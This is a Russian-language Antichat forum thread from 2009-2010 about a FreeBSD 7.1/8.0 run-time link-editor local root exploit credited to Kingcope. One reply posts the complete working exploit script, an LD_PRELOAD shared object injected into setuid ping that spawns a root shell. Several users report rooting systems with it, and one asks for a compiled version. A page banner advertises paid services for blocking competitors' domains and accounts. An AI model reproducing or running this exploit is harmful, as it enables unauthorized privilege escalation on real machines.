FreeBSD 7.1, 8 root expl.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
FreeBSD 7.1, 8 root expl.

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

FreeBSD 7.1, 8 root expl.

01.12.2009, 13:07

BlackSun

Познавший АНТИЧАТ

Регистрация: 01.04.2007

Сообщений: 1,268

С нами:
10058786

Репутация: 4589

FreeBSD 7.1, 8 root expl.

###############################
# EDB-ID: 10255
# CVE-ID: ()
# Title: FreeBSD Run-Time Link-Editor Local r00t Zeroday
# Author: Kingcope
# Published: 2009-11-30
###############################

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

http://www.exploit-db.com/exploits/10255

𝕏 Twitter Reddit Telegram Копировать ссылку

01.12.2009, 15:32

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

С нами:
9419426

Репутация: 648

Потестил на 6.4-RELEASE-p7 #7 - не пашет. Буду тестить дальше.

01.12.2009, 16:18

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами:
10226672

Репутация: 441

7.0 поестил результат рут)
Тс респект)
7.2 тоже.

Последний раз редактировалось DimOnOID; 01.12.2009 в 16:45..

05.12.2009, 23:25

svesve

Постоянный

Регистрация: 15.06.2007

Сообщений: 527

С нами:
9950786

Репутация: 214

7.1 рутит

16.12.2009, 02:12

Seregakz

Познающий

Регистрация: 13.06.2009

Сообщений: 32

С нами:
8901549

Репутация: 2

закинте плз в откомпелированом виде)

17.12.2009, 04:10

~~kodzero~~

Banned

Регистрация: 11.05.2009

Сообщений: 128

С нами:
8948235

Репутация: 72

7.1 Срутил.Спасибо.

19.12.2009, 05:51

xena-mil1

Познающий

Регистрация: 17.10.2006

Сообщений: 83

С нами:
10297512

Репутация: 55

сам експлоит

PHP код:


		
			
#!/bin/sh

echo ** FreeBSD local r00t zeroday

echo by Kingcope

echo November 2009

cat > env.c << _EOF

#include <stdio.h>



main() {

        extern char **environ;

        environ = (char**)malloc(8096);



        environ[0] = (char*)malloc(1024);

        environ[1] = (char*)malloc(1024);

        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");



        execl("/sbin/ping", "ping", 0);

}

_EOF

gcc env.c -o env

cat > program.c << _EOF

#include <unistd.h>

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>



void _init() {

        extern char **environ;

        environ=NULL;

        system("echo ALEX-ALEX;/bin/sh");

}

_EOF

gcc -o program.o -c program.c -fPIC

gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles

cp w00t.so.1.0 /tmp/w00t.so.1.0

./env

7.1 - взяло рут
6.4 - не взяло

19.12.2009, 05:58

navigat0r

Участник форума

Регистрация: 15.03.2009

Сообщений: 231

С нами:
9030403

Репутация: 146

добряк, ТС, добряк
спасибо, порутал

12.01.2010, 18:35

M@rtein

Познающий

Регистрация: 09.08.2007

Сообщений: 58

С нами:
9872056

Репутация: 15

FreeBSD 7.1-RELEASE-p5
рут - успешно

#10

20.01.2010, 22:46

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами:
9410786

Репутация: 2731

У меня он не запускается, пишет, что файл не найден...
Мои действия:

Код:

$ cd /tmp
$ wget http://myhost.ru/w00t.sh
$ chmod 777 w00t.sh
$ ./w00t.sh
: No such file or directory

Страница 1 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши вопросы по уязвимостям.	blackybr	Уязвимости	24371	27.04.2015 19:28
Помогите откомпилить!!	LoFFi	Уязвимости	19	19.03.2006 22:56

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules